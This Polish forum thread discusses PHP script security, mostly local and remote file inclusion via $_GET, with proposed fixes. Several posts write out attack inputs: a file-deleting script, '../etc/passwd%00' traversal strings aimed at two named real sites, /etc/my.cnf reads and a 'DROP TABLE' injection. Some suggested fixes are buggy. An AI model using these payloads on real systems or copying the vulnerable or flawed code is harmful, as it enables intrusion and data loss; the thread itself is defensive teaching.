Bezpieczeństwo skryptów PHP, Jak zabezpieczyć się przed włamaniem Opcje

[Diwi]

Witam.

Chciałbym rozpocząć temat o bezpieczeństwie skryptów php. Na forum istnieje już temat o bezpieczeństwu przy wykonywaniu zapytania SQL lecz nie ma o ogólnym bezpieczeństwie skryptów.

1. Złe używanie include.

Często dołączamy pliki dynamicznie pobierając miejsce gdzie znajduje się plik metodą GET.

Przykładowy adres:
http://www.jakas-strona.pl/index.php?plik=katalog.php

Kod php:

[PHP] pobierz, plaintext 
<?php
include($_GET['plik']);
?>
[PHP] pobierz, plaintext 

Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres:
http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.php

Dajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak:

[PHP] pobierz, plaintext 
<?php
 
$katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany */
 
while ($plik = readdir($katalog)) {
 
	  unlink($file);
 
}
 
?>
[PHP] pobierz, plaintext 

No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.

Jak temu zapobiec

Rozwiązanie 1.

Tworzymy taki include:

[PHP] pobierz, plaintext 
<?php
include('./'.$_GET['katalog']);
?>
[PHP] pobierz, plaintext 

Taka instrukcja pozwala na dołączanie jedynie plików które znajdują się w katalogu ze skryptem czyli nie można załączyć pliku z innego serwera.

Ja narazie pamiętam tylko tyle lecz jeżeli znacie jakieś inne błędy popełniane przez programistów a także sposoby walczenia z nimi to się tutaj dopiszcie

Pozdrawiam

// prosiłbym moderatorów (jeżeli można) o przyklejenie tego tematu

---
Przyklejone - hwao

[bregovic]

Zaczynając od podstaw, to jakiekolwiek używanie zmiennej $_GET razem z konstrukcja require lub include jest pomyłką, błędem i koszmarem. Jeśli już naprawdę musisz include'ować coś pochodzącego z adresu, to zrób sobie tablicę w skrypcie, coś w stylu:

[PHP] pobierz, plaintext 
<?php
 
$tablica[1] = 'jakisplik1';
$tablica[2] = 'jakisplik2';
$tablica[3] = 'jakisplik3';
$tablica[4] = 'jakisplik4';
 
include $tablica[$_GET['costam']];
 
?>
[PHP] pobierz, plaintext 

Oczywiście to rozwiązanie jest koszmarkiem jeśli masz dużą ilość akcji - wtedy trzeba zrobic cos w tym stylu:

[PHP] pobierz, plaintext 
<?php
 
 
if(file_exist('bezpieczny_katalog/'.$_GET['costam'].'.php'))
{
	include 'bezpieczny_katalog/'.$_GET['costam'].'.php';
}
 
?>
[PHP] pobierz, plaintext 

Generalna zasada to zawsze zakładać że input inny niż tego chcemy, i że user próbuje nas zaatakować.

[Wave]

A najczęstszym błędem jest stosowanie zmiennych bez odnoszenia się do tablic superglobalnych.
np.

[PHP] pobierz, plaintext 
<?php
 
$var; // zamiast
$_COOKIE['var'];
$_POST['var'];
$_GET['var'];
$_SESSION['var'];
 
?>
[PHP] pobierz, plaintext 

Co daje pole do popisu, dla potencjalnego hax0ra.
Jeżeli nie chce nam się pisać tych długich zmiennych można zastosować coś takiego:

[PHP] pobierz, plaintext 
<?php
 
while (list($k, $v) = each ($_GET)) {
${$k} = $v;
}
 
?>
[PHP] pobierz, plaintext 

----
Sorka ze sie dopisze ale nie chce mi sie pisac nowego posta )

Jak komus sie nie che to polecam

[PHP] pobierz, plaintext 
<?php
$g = & $_GET;
// i mammy
$g['id'];
 
?>
[PHP] pobierz, plaintext 

[sobstel]

Zaczynając od podstaw, to jakiekolwiek używanie zmiennej $_GET razem z konstrukcja require lub include jest pomyłką, błędem

a na przyklad w takiej konstrukcji :

[PHP] pobierz, plaintext 
<?php
 
if (ctype_alnum($_GET['go'])) {
  include $_GET['go'].'.php';
}
 
?>
[PHP] pobierz, plaintext 

?

tak czy owak moim zdaniem najwazniejsze w tym wszyskim jest odpowiednie filtrowanie wszystkiego co pochodzi z zewnątrz lub w czym zewnętrzny użytkownik mógł maczać palce ... i zdawać sobie sprawę z tego, że nigdy nei jesteśmy w pełni bezpieczni.

[Speedy]

To ja dodam od siebie jeszcze, że niektóre osoby pisząc aplikacje internetowe, stosują coś takiego jak przechowywanie poufnych danych o userze (po zalogowaniu) w pliku cookie. Taki potencjalny H4X0R może sobie potem swobodnie przeglądać zawartość tych plików i dowolnie je modyfikować. Najgorzej jest wtedy, gdy w takim pliku przechowywana jest wartość zmiennej odpowiedzialna np. za uprawnienia administratora... Wtedy wystarczy ją odpowiednio podmienić i śmiga .
Rozwiązaniem są sesje, które przechowują dane na serwerze.

Pozdrawiam.

[yavaho]

Mozna nieco przefiltrowac zmiena ktora pzechowuje nazwe dolaczanego pliku. I jezeli jest to plik z innej domeny to adres zostanie nieco zmodyfikowany na tyle ze nie zostanie znaleziony.

[PHP] pobierz, plaintext 
<?php
if(isset($_GET['page'])){
  $page = ereg_replace(&#092;"://\",\"#\",$_GET['page']);
}else{
  $page='glowna';
}
?>
[PHP] pobierz, plaintext 

Mozna jeszcze wszystkie includowane pliki przechowywac w jakims jednym katalogu i przed wywolaniem takiego pliku zawsze do zmiennej bedzie dolepiona sciezka co zmieni "niechciane linki" . Mozna tez sprawdzic czy includowany plik napewno pochodzi z naszej domeny basename()" title="Zobacz w manualu PHP" target="_manual

[PHP] pobierz, plaintext 
<?php
if(file_exists('skrypty/'.$page.'.php')){
  include ('skrypty/'.basename($page.'.php'));
}else{
  include ('skrypty/glowna.php');
}
?>
[PHP] pobierz, plaintext 

Po takiej filtracji ja bym sie czul zupelnie spokojnie.

@Speedy czasem musimy cos zostawic w ciasteczku aby rozpoznac danego uzytkownika. Np podczas stosowania autologinu do panelu admina - i tu niestety jest niebezpieczenstwo, na ktore ja nie znam jeszcze dobrego zabezpieczenia.

[matid]

@Speedy czasem musimy cos zostawic w ciasteczku aby rozpoznac danego uzytkownika. Np podczas stosowania autologinu do panelu admina - i tu niestety jest niebezpieczenstwo, na ktore ja nie znam jeszcze dobrego zabezpieczenia.

A nie wystarczy czasem skorzystać z funkcji session_set_cookie_params" title="Zobacz w manualu PHP" target="_manual ?

[sobstel]

@Speedy czasem musimy cos zostawic w ciasteczku aby rozpoznac danego uzytkownika. Np podczas stosowania autologinu do panelu admina - i tu niestety jest niebezpieczenstwo, na ktore ja nie znam jeszcze dobrego zabezpieczenia.

A nie wystarczy czasem skorzystać z funkcji session_set_cookie_params" title="Zobacz w manualu PHP" target="_manual ?

Efekt działania tej funkcji widoczny jest tylko do końca działania skryptu.

[Ociu]

sprawdzanie $_GET'ów etc. :

[PHP] pobierz, plaintext 
<?php
if(is_int($_GET['id']))
?>
[PHP] pobierz, plaintext 

Wave: lepiej używać foreach.

[vala]

a nie lepiej zrobic prosty switch ?
ustalimy sobie wtedy wszystkie dostepne przypadki i lux

o cos takiego :

[PHP] pobierz, plaintext 
<?php
 
 
if(isset($_GET['id']))
{
  switch($_GET['id'])
  {
   case &#092;"newsy\":  
   case &#092;"smieci\": $ref=$_GET['id'];break;
   
   default: $ref=&#092;"newsy\";
   
   }
   
  include(&#092;"katalog/\".$ref.\".php\");
 
}
 
 
?>
[PHP] pobierz, plaintext 

Ten post edytował vala 14.05.2005, 18:55:07

[AxZx]

a nie lepiej zrobic prosty switch ?
ustalimy sobie wtedy wszystkie dostepne przypadki i lux

o cos takiego :

[PHP] pobierz, plaintext 
<?php
 
 
if(isset($_GET['id']))
{
  switch($_GET['id'])
  {
   case &#092;"newsy\":  
   case &#092;"smieci\": $ref=$_GET['id'];break;
   
   default: $ref=&#092;"newsy\";
   
   }
   
  include(&#092;"katalog/\".$ref.\".php\");
 
}
 
 
?>
[PHP] pobierz, plaintext 

@Vala - mozna to zrobic tak, wtedy nie trzeba dawac if(isset(....

[PHP] pobierz, plaintext 
<?php
 
 
 
  switch(@$_GET['id'])
  {
   case &#092;"newsy\":  
   case &#092;"smieci\": $ref=$_GET['id'];break;
   
   default: $ref=&#092;"newsy\";
   
   }
   
  include(&#092;"katalog/\".$ref.\".php\");
 
 
 
 
 
?>
[PHP] pobierz, plaintext 

[sobstel]

@Vala - mozna to zrobic tak, wtedy nie trzeba dawac if(isset(.

trzeba jesli nie chcemy aby pojawial sie nam blad typu E_NOTICE kiedy id nie bedzie w adresie (najczesciej jest to strona glowna). ewentualnie mozna wczesniej umiescic sprawdzenie if (!isset($_GET['id']) $ref="newsy";

[Lars]

ja mam prosty skrypt:

[PHP] pobierz, plaintext 
<?php
if(isset($_GET['mod'])) {
$mod=$_GET['mod'];
} else {
$mod=&#092;"news\";
}
 
if(isset($_GET['act'])) {
$act=$_GET['act'];
} else {
$act=&#092;"list\";
}
 
$file=$mod.'/'.$act.'.php';
 
if(!file_exists($file)) {
die();
} else {
include &#092;"$file\";
}
?>
[PHP] pobierz, plaintext 

czy file_exists zabezpiecza includowanie z innego serwera??

[sobstel]

czy file_exists zabezpiecza includowanie z innego serwera??

tak, ale "Od wersji 5.0.0 php ta funkcja może być użyta także z niektórymi wrapperami URL."

[yavaho]

czy file_exists zabezpiecza includowanie z innego serwera??

Tak, ale tylko w przypadku gdy prawdziwa nazwa includowanego pliku lub sciezka do niego bedzie nieco inna niz ta przekazywana w zmiennej.

W tym przypadku wszystkie includowane pliki musza znajdowac sie w odpowiednim katalogu.

[PHP] pobierz, plaintext 
<?php
if(!file_exists('katalog/'.$file.'.php')) {
die();
} else {
include('katalog/'.$file.'.php');
}
?>
[PHP] pobierz, plaintext 

W tym przypadku wszystkie includowane pliki musza miec specyficzny jednakowy poczatek nazwy pliku.

[PHP] pobierz, plaintext 
<?php
if(!file_exists('inc_'.$file.'.php')) {
die();
} else {
include('inc_'.$file.'.php');
}
?>
[PHP] pobierz, plaintext 

I jezeli w zmiennej przekaze ktos sciezke do innego serwera to taki plik nie zostanie znaleziony.

[gu35t]

pamietejcie o zonku jaki moze zrobic haxior znakiem pustym:
czyli mam taki np kodzik:

[PHP] pobierz, plaintext 
<?php
if(....){
include './skrypty/' . $_GET['plik'] . '.php';
}
?>
[PHP] pobierz, plaintext 

haxior moze wpisac cos takiego
index.php?plik=../../../../../../../etc/passwd%00
czyli:
include ./skrypty/../../../../../../../etc/passwd%00.php no i sie nam pieknie otwarl plik
dobra wiadomosc: znak pusty(\0 == %00) juz na malo jakim serwerze dziala ale czasami znajde.
to znalalem w przeciagu 2 min na google:
http://www.nfz-krakow.pl/index.php?plik=ko..../../etc/passwd
http://www-users.mat.uni.torun.pl/~ghost/i..../../etc/passwd

[sobstel]

1. kolega pytal tylko czy mozna otworzyc w ten sposob zewnetrzne pliki
2. mysle ze uzycie file_exists() i basename() jest dobrym sposobem na dolaczanie plikow, ale jak jest ich stosunkowo niewiele zawsze najlepiej zrobic switcha
3. co do zanku pustego to dziala tam gdzie jest wylaczone automatyczne magic_quotes i ktos nie zabezpieczyl tego samemu

[Lars]

co do: http://www-users.mat.uni.torun.pl/~ghost/i..../../etc/passwd

to można to zabezpieczyć:

[PHP] pobierz, plaintext 
<?php
....przed includem
 
$_GET['plik']=str_replace(&#092;"/\", \"#\", $_GET['plik']);
 
include $_GET['plik'];
 
dalej....
?>
[PHP] pobierz, plaintext 

prosty przykład filtrowania danych

[sobstel]

co do: http://www-users.mat.uni.torun.pl/~ghost/i..../../etc/passwd

to można to zabezpieczyć:

[PHP] pobierz, plaintext 
<?php
....przed includem
 
$_GET['plik']=str_replace(&#092;"/\", \"#\", $_GET['plik']);
 
include $_GET['plik'];
 
dalej....
?>
[PHP] pobierz, plaintext 

prosty przykład filtrowania danych

ja mimo wszystko upieralbym sie przy basename" title="Zobacz w manualu PHP" target="_manual()

[Vengeance]

@bregovic:

Twój sposób

[PHP] pobierz, plaintext 
<?php
 
$tablica[1] = 'jakisplik1';
$tablica[2] = 'jakisplik2';
$tablica[3] = 'jakisplik3';
$tablica[4] = 'jakisplik4';
 
include $tablica[$_GET['costam']];
 
?>
[PHP] pobierz, plaintext 

Też nie jest bezpieczny... dajmy na to wywołam URL:
/skrypt.php?tablica[foobar]=haxiorskiPlik&costam=foobar

Oczywiscie zagrozenie wynika glownie wtedy gdy mamy dostep do zrodel... choc czasem da sie takze zgadnac nazwy zmiennych

[dr_bonzo]

A wystarczy dodac
$tablica = array();
przed jej uzyciem i po klopocie.
A poza tym to bylo tylko

to zrób sobie tablicę w skrypcie, coś w stylu

, pisane szybko i bez doglebnego zastanowienia

[Lars]

Jeżeli już trzeba zrobić coś takiego:

[PHP] pobierz, plaintext 
<?include $_GET['id'].'.php';?>
[PHP] pobierz, plaintext 

to zawsze lepiej:

[PHP] pobierz, plaintext 
<?php
$file=$_GET['id'].'.php';
if(file_exists($file)) {
include $file;
} else {
echo 'Błąd 404';
}
?>
[PHP] pobierz, plaintext 

Jest jeszcze coś takiego (działą tylko z rg=on).

Mamy kod:

[PHP] pobierz, plaintext 
<?php
<form action='ksiega.php' method='post'>
<input type='text' name='nick' value='twoj nick'>
<textarea name='tekst'>Twoj tekst</textarea>
<input type='submit' value='Wyslij'>
</form>
?>
[PHP] pobierz, plaintext 

i plik ksiega.php:

[PHP] pobierz, plaintext 
<?php
$file=fopen('data.txt', a);
$zawartosc='<b>'.$nick.'</b><br>'.$tekst.'<br><br>';
fwrite($file, $zawartosc);
fclose($file);
echo 'OK. <a href=\"javascript:history.back()\">Wróć</a>';
?>
[PHP] pobierz, plaintext 

jest tu bardzo wiele luk, m. in:

• 1. Możliwość wstawienia dowolnej długości nicka/tekstu
• 2. Umieszczanie kodu !!html!!
• 3. wpis danych przez ?nick=nick&tekst=txt
• 4. możliwość uszkodzenia pliku data.txt przez wpisywanie sie przez 2 osoby w tym samym momencie
• 5. użycie kodu php

jak je usunąć??

1. Użycie strlen" title="Zobacz w manualu PHP" target="_manual:

[PHP] pobierz, plaintext 
<?php
$file=fopen('data.txt', a);
$nick=stripslashes($nick);
$tekst=stripslashes($tekst);
if(strlen($nick>10)) {
die('Za długi nick');
} elseif(strlen($tekst>100)) {
die('Za długi tekst');
}
$zawartosc='<b>'.$nick.'</b><br>'.$tekst.'<br><br>';
fwrite($file, $zawartosc);
fclose($file);
echo 'OK. <a href=\"javascript:history.back()\">Wróć</a>';
?>
[PHP] pobierz, plaintext 

2. Użycie strip_tags" title="Zobacz w manualu PHP" target="_manual:

[PHP] pobierz, plaintext 
<?php
$file=fopen('data.txt', a);
$nick=stripslashes($nick);
$tekst=stripslashes($tekst);
 
$nick=strip_tags($nick);
$tekst=strip_tags($tekst);
 
if(strlen($nick>10)) {
die('Za długi nick');
} elseif(strlen($tekst>100)) {
die('Za długi tekst');
}
$zawartosc='<b>'.$nick.'</b><br>'.$tekst.'<br><br>';
fwrite($file, $zawartosc);
fclose($file);
echo 'OK. <a href=\"javascript:history.back()\">Wróć</a>';
?>
[PHP] pobierz, plaintext 

3. Zamiast $tekst/$nick używamy $_GET['tekst']/$_GET['nick']:

[PHP] pobierz, plaintext 
<?php
$file=fopen('data.txt', a);
$_GET['nick']=stripslashes($_GET['nick']);
$_GET['tekst']=stripslashes($_GET['tekst']);
$_GET['nick']=strip_tags($_GET['nick']);
$_GET['tekst']=strip_tags($_GET['tekst']);
 
if(strlen($_GET['nick']>10)) {
die('Za długi nick');
} elseif(strlen($_GET['tekst']>100)) {
die('Za długi tekst');
}
$zawartosc='<b>'.$_GET['nick'].'</b><br>'.$_GET['tekst'].'<br><br>';
fwrite($file, $zawartosc);
fclose($file);
echo 'OK. <a href=\"javascript:history.back()\">Wróć</a>';
?>
[PHP] pobierz, plaintext 

4. Użycie flock" title="Zobacz w manualu PHP" target="_manual:

[PHP] pobierz, plaintext 
<?php
$file=fopen('data.txt', a);
$_GET['nick']=stripslashes($_GET['nick']);
$_GET['tekst']=stripslashes($_GET['tekst']);
flock($file, 2);
$_GET['nick']=strip_tags($_GET['nick']);
$_GET['tekst']=strip_tags($_GET['tekst']);
 
if(strlen($_GET['nick']>10)) {
die('Za długi nick');
} elseif(strlen($_GET['tekst']>100)) {
die('Za długi tekst');
}
$zawartosc='<b>'.$_GET['nick'].'</b><br>'.$_GET['tekst'].'<br><br>';
fwrite($file, $zawartosc);
flock($file, 3);
fclose($file);
echo 'OK. <a href=\"javascript:history.back()\">Wróć</a>';
?>
[PHP] pobierz, plaintext 

5. To to samo co w punkcie 2 .

Powód edycji: Porządki // Piniek

[Vaticinator]

A jest jakaś możliwość, żeby wybrane pliki dało się otwierać tylko poprzez include(), a nie bezpośrednio z przeglądarki?

[sobstel]

A jest jakaś możliwość, żeby wybrane pliki dało się otwierać tylko poprzez include(), a nie bezpośrednio z przeglądarki?

jest, na szybko przychodzą mi do glowy 2 sposoby :

1. umiescic pliki w jakims katalogu i zabezpieczyc plikiem .htaccess z odpowiednim wpisem (deny from all)
2. umiescic pliki powyzej public_html

[bregovic]

A jest jakaś możliwość, żeby wybrane pliki dało się otwierać tylko poprzez include(), a nie bezpośrednio z przeglądarki?

Plik includeujący:

[PHP] pobierz, plaintext 
<?php
 
define('x', true);
include 'lol.php';
 
?>
[PHP] pobierz, plaintext 

Plik lol.php:

[PHP] pobierz, plaintext 
<?php
 
if(!x) die();
//reszta pliku
 
?>
[PHP] pobierz, plaintext 

[mike]

W związku z ostatnim postem tutaj, który poruszał problem już omówiony postanowiłem trochę oczyścić ten wątek.

Kilka postów zostało usuniętych - zostały te które powinny zostać

Od tej chwili, proszę użytkowników zwłaszcza początkujących o czytanie tego wątku od początku a nie tylko dopisywanie się na końcu bez czytania całości tego wątku.

Czasem (a raczej często) rozwiązanie problemu jaki macie już padło. Warto poświęcić czas na odszukanie rozwiązania.

P.S.
To nie jest kącik lamerskich pytań!

[huntercs]

Ja stosuję w sumie proste rozwiązanie, dodaje tylko strony do których użytkownik może wejść i tyle, jeżeli chce wejść na inną to jest przekierowany na str. główną

[PHP] pobierz, plaintext 
<?php
$Section=$_GET['Section'];
 
if($Section!='Main' &&
$Section!='Activate' &&
$Section!='Kolejna_strona' &&
$Section!='Inna_strona' &&
$Section!='Regulamin')
header("Location: ?Section=Main");
else include_once($Section.".php");
?>
[PHP] pobierz, plaintext 

[nospor]

No ale poco trzeba pisac nazwe skryptu? Skoro i tak juz to oifowales, to daj identyfikator a nie nazwe. Po co ktoś ma wiedziec jakie masz skrypty?

[mike]

~huntercs możesz to zrobić bardziej elastycznie i elegancko:

[PHP] pobierz, plaintext 
<?php
 
$_GET[ 'Section' ] = ( empty( $_GET[ 'Section' ] ) ) ? 'Main' : '';
 
$arrAllowSection = array(
						  'Main'		=> 'Main.php',
						  'Activate'	=> 'Activate.php',
						  'Inna_strona' => 'Inna_strona.php',
						  'Regulamin'   => 'Regulamin.php'
						);
 
if( in_array( $_GET[ 'Section' ], $arrAllowSection ) )
{
	include_once( $arrAllowSection[ $_GET[ 'Section' ] ] );
}
else
{
	include_once( $arrAllowSection[ 'Main' ] );
}
 
?>
[PHP] pobierz, plaintext 

Masz teraz możliwość prostego i łatwego dodawanie stron i nie musisz ich adresów uzależniać od wartości $_GET[ 'Section' ]. Bo możesz dawać inne nazwy plików.

[vedeney]

I like php-coding in this way

[PHP] pobierz, plaintext 
<?php
include_once(((isset($_GET[ 'Section' ]) && !empty($_GET[ 'Section' ])) && is_file(str_replace(array(".","/"),"",$_GET['Section']).".php"))?str_replace(array(".","/"),"",$_GET['Section']).".php":'Main.php');
?>
[PHP] pobierz, plaintext 

Just one line, not 21!

[ave]

nie prosciej switch-em ?

[PHP] pobierz, plaintext 
<?php
switch($_GET['id']){
case 'aa': include('aa.php');break;
case 'bb': include('bb.php');break;
default:   include('main.php');
}
?>
[PHP] pobierz, plaintext 

[Speedy]

Switch może być dobry w przypadku, gdy jest mało stron i ich ilość nie jest mobilna. Zauważ, że dla każdego pliku musisz doklepywać osobnego case'a, a można to przecież zrobić bardziej dynamicznie .

[the_foe]

Jezeli programuje obiektowo to automatyzuje wybieranie stron przez wybieranie metod.
Zaluzmy ze $_GET['p'] odpowiada za podstrone:

[PHP] pobierz, plaintext 
<?php
	 function get_page()
	{
	/*metoda zajmuje sie analizowaniem zmiennej p
	zgodnie z jej wartoscia przerzuca skrypt do 
	metody link_wartosc
	*/
	if (!isset($_GET['p']))
	{
 
		$this->link_index();
	}
	else
	{
		$a=strtolower($_GET['p']);
		$a=ereg_replace('([^a-z0-9_-])',"",$a);
		if ($a=="")
		{
			$this->link_index();
		}
		else
		{
			$z=method_exists($this,"link_".$a);
			if ($z==1)
			{
				eval('$this->link_'.$a.'();');
			}else{
				$this->error();
			}
		}
	}
 
	}
?>
[PHP] pobierz, plaintext 

tworzymy wiec medtode dla linku www.domena.pl/?p=strona link_strona. W metodzie (funkcji) moze byc zwykly include.
Kiedy dana strona nie istnieje, czyli nie stworzylismy danej metody, zostanie uruchomiona metoda error(). Np strona bledu 404 ktora zaprojektujemy, albo zwykly redirector do indeksu.

[LamaMASTER]

1. Złe używanie include.

Często dołączamy pliki dynamicznie pobierając miejsce gdzie znajduje się plik metodą GET.

Przykładowy adres:
http://www.jakas-strona.pl/index.php?plik=katalog.php

Kod php:

[PHP] pobierz, plaintext 
<?php
include($_GET['plik']);
?>
[PHP] pobierz, plaintext 

Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres:
http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.php

Dajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak:

[PHP] pobierz, plaintext 
<?php
 
$katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany */
 
while ($plik = readdir($katalog)) {
 
	  unlink($file);
 
}
 
?>
[PHP] pobierz, plaintext 

No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.

Jak temu zapobiec

Rozwiązanie 1.

Tworzymy taki include:

[PHP] pobierz, plaintext 
<?php
include('./'.$_GET['katalog']);
?>
[PHP] pobierz, plaintext 

Taka instrukcja pozwala na dołączanie jedynie plików które znajdują się w katalogu ze skryptem czyli nie można załączyć pliku z innego serwera.

Ludzie litości! Wielkie zabezpieczenia, a ja widzę, że tu ktoś podstaw php nie zna! Od kiedy to w include idzie podać ścieżkę do innego serwera? Jeżeli podamy:

[PHP] pobierz, plaintext 
<?
include('http://www.domena.pl/skrypt.php');
?>
[PHP] pobierz, plaintext 

to skrypt nie zostanie zincludowany! Taka opcja jest możliwa jest jedynie w funkcji readfile (do tego właśnie ona jest).
Zastosowanie:

[PHP] pobierz, plaintext 
<?
include($zmienna);
?>
[PHP] pobierz, plaintext 

jest dosyć bezpieczne (zależy od skryptu). Najbardziej bezpieczne jest już:

[PHP] pobierz, plaintext 
<?
include('katalog/'.$zmienna.'.php');
?>
[PHP] pobierz, plaintext 

Ludzie - jak ja widzę takie bzdury, że wtedy za pomocą index.php?zmienna=http:///cośtam można zhackować stronę to mnie krew zalewa. Tak samo w przypadku tematu o SQL Injection - pierdół pełno powypisywane. Skoro już piszecie w ciemno, to najpierw polecam czy takie coś zadziała, a potem pisać jak przeciwdziałać.
W dodatku przy powyższym skrypcie jeżeli dodamy:
$zmienna = $_GET['zmienna'];
to nie stanie się nic innego jak to, że zmienna przybierze wartość z adresu 2 razy (a co za tym idzie skrypt będzie wykonywany wolniej). Pokażcie mi w tym jakąś lukę to zwracam honor...

Reszty postów i tematu całego wolę dalej nie czytać

[nospor]

Ludzie litości! Wielkie zabezpieczenia, a ja widzę, że tu ktoś podstaw php nie zna! Od kiedy to w include idzie podać ścieżkę do innego serwera?

hmmm, manual klamie?
http://pl.php.net/manual/pl/function.include.php

Jeśli "URL fopen wrappers" są włączone w php (takie jest domyślne ustawienie) można podać nazwę pliku do wczytania używając adresu URL (przez protokół HTTP lub innym obsługiwanym sposobem - zajrzyj do Dodatek M aby zapoznać się z listą obsługiwanych protokołów), zamiast podawać ścieżkę lokalną.

Nie sprawdzalem tego nigdy, ale wierze manualowi

edit: sprawdzilem. manual nie klamie. da sie
Na przyszlosc jak kogos oskarżasz o brak podstaw, sprawdź, czy sam je posiadasz

q.php

[PHP] pobierz, plaintext 
<?php
include($_GET['file']);
?>
[PHP] pobierz, plaintext 

a link do skryptu:
http://rpn/test/q.php?file=http://forum.webcity.pl/index.php
no i tym sposobem odpalilem se konkurencyjne forum, a teoretycznie chcialem moją stronę

Reszty postów i tematu całego wolę dalej nie czytać

ja rowniez ci tego nie polecam dla Twego dobra, jeszcze cię coś naprawdę zaleje .

[kszychu]

A ja z kolei dodam, że3 należałoby się przyjrzeć składni include i pochodnych. Zwłaszcza polecam lekturę: jak zachowuje sieinclude pobierając pliki z innych serwerów.
Kolega LamaMASTER myli się, da się zaincludować skrypt php z innego serwera, z drobnym ale... Uważacie, że apache na tym serwerze puści na źródło skryptu, bo my go o to poprosimy?... Nie? A jak zachowa się apache?...
I obyśmy tylko takich hakerów mieli, którzy skrypt niszczący odpalają z własnego serwera :-D

[LamaMASTER]

Na moim serwerze taki trick nie działa, dlatego byłem przekonany, że nie idzie (tak samo było u moich kolegów).

[nospor]

I tylko dlatego, ze u ciebie ten trick nie dziala, to jedziesz po innych uzytkownikach? oskarżasz ich o brak wiedzy, o brak testow tego co robią, o nieczytanie manuala? Zastanow sie co robisz.

Slyszales kiedys o czymś takim, ze kazdy serwer mozna inaczej skonfigurowac?

ps: wspominales cos o zwróceniu honoru... jakos tego nie zauwazylem bys to zrobil

[LamaMASTER]

ps: wspominales cos o zwróceniu honoru... jakos tego nie zauwazylem bys to zrobil

\/

Pokażcie mi w tym jakąś lukę to zwracam honor

Gdzie masz jakieś pierdoły na ten temat? Podaj przykłady, a nie świeć swoimi mądrościami.

Przykład: Skoro mamy np. mysql_query, to nie jest możliwe zrobienie czegoś takiego: news.php?id=1;DROP%20TABLE%20news; , bo mysql_query pozwala na wysłanie tylko jednego zapytania.

Poświeciłem poświeciłem i się wyświeciło Przepraszam za zamieszanie

[Vengeance]

Ale przy postgresql, mssql czy oracle to już zadziała... pamiętaj, świat nie ogranicza się do mySQL

[thornag]

Wracajac do powyższej dyskusji na temat include to chcialbym i cos od siebie dodac.

Założmy, że manual klamie (to tak tylko na cele posta ) i include nie pozwala dołączać URLi z zewnatrz. Ważne jest tez, że administrator nie wpadł na takowy pomysł i nie ma poistawionego Apache'a na chroocie.

Mamy podany wyzej include o postaci:

[PHP] pobierz, plaintext 
<?php
 
include($_GET['zmienna']);
 
?>
[PHP] pobierz, plaintext 

Warto dodac ze skrypt taki umiescimy w pliku index.php

No i teraz czas na zabawe, katalogi moga byc różne w zależnosci od Linuxa u mnie na jednym serwerze z OpenBSD i Apachem na chroocie oczywiscie nie dziala ale na drugim z Red Hatem mozna sie pobawic.

Przekazujemy takie adresy

http://domena/index.php?zmienna=/etc/my.cnf (jak mowilem w zaleznosci od serwera)

i widzimy konfiguracje MySQLa, idzmy dalej

http://domena/1.php?zmienna=/etc/passwd

titaj mamy informacje o userach na serwerze

adresow do tego typu plikow mozna szukac wiecej stopien niebezpieczenstwa zależy od stopnia wiedzy intruza.

Ale to tak chcialem dorzucic bo nie lubie jak ktos pisze bzdury ze inni bzdury piszanie patrzac nawet do manuala zachowuje sie wtedy jak moj stary tzn chodzbym mu dowod na pismie na cos przedstawil to stary i tak uwaza ze ma racje

Pozdrawiam

[kszychu]

@thornag: dziękujemy za jakże wnikliwą analizę problemu. Zanim uraczysz nas kolejnymi rewelacjami bądź łaskaw czytać dokładnie wątki, w których się udzielasz. Jeśli nie całe to chociaż pierwsze strony.

[Jarod]

Co znaczy apach na chroocie?

[thornag]

@thornag: dziękujemy za jakże wnikliwą analizę problemu. Zanim uraczysz nas kolejnymi rewelacjami bądź łaskaw czytać dokładnie wątki, w których się udzielasz. Jeśli nie całe to chociaż pierwsze strony.

Wszak nawet nie smiem twierdzic ze to rewelacje chyba wiekszosc forumowiczow doskonale o tym wie. Watek czytalem acz byc moze umknely mi posty o wyswietlaniu plikow konfiguracyjnych. Pozatym nie pisze tego by raczyc rewelacjami a jedynie by pokazac tym ktorzy w nieswiadomosci zyja ze cos takiego jest mozliwe. I nawiazujac wlasnie do tego co przed momentem napisalem a dokladniej mowiac do przydatnosci posta odpwoiem na pytanie poprzednika:

chroot to taki mechanizm, ktory sprawia, ze np. Apache uznaje, że katalogiem głównym systemu jest dla niego katalog instalacji czyli np. /var/www po to by nikt nie mogl zrobic directory traversal nawet jak przejmiesz apache, to nie wyleziesz do prawdziwego katalogu. To trak w skrocie czyli tyle co sam wiem co mi przekazano

Edit:

kszychu ==> rzeczywiscie zwracam honor, przy czytaniu umknela mi strona nr.2 moj blad jak najbardziej przyznaje racje, aczkolwiek musze zaznaczyc ze nie mialem złych zamiarow

Ten post edytował thornag 14.04.2006, 02:22:15

[Nightwalker]

Witam,

Mam pytanie, czy ten kod jest w miare bezpieczny?

[PHP] pobierz, plaintext 
<?php
zapisz($_GET['sekcja']);
?>
[PHP] pobierz, plaintext 

[PHP] pobierz, plaintext 
<?php
function zapisz($dbs)
{
	$plik = 'database/'.$dbs.'.dbs';
	$otworzplik = fopen($plik, 'w+') or die("Blad podczas otwierania!");
	$zapiszplik = fwrite($otworzplik, $zamiana) or die("Blad podczas zapisywania!");
}
 
?>
[PHP] pobierz, plaintext 

uzycie funkcji zapisz() jest w if(isset($_COOKIE["Admin"])) (jezeli cookie sie nie zgadza nie ruszy)

Zreszta podam adres skryptu http://firefoks.be/admin.php (który zresztą za niedługo opublikuje )

Pozdrawiam

Ten post edytował Nightwalk 14.04.2006, 03:30:52

[mumin.php]

Witam

Jestem nowy na forum i zgodnie z sugestią mike_mech'a przeczytałem cały wątek. Wydaje mi się że nie znalazłem odpowiedzi na moje pytanie, więc pozwolę sobie zapytać

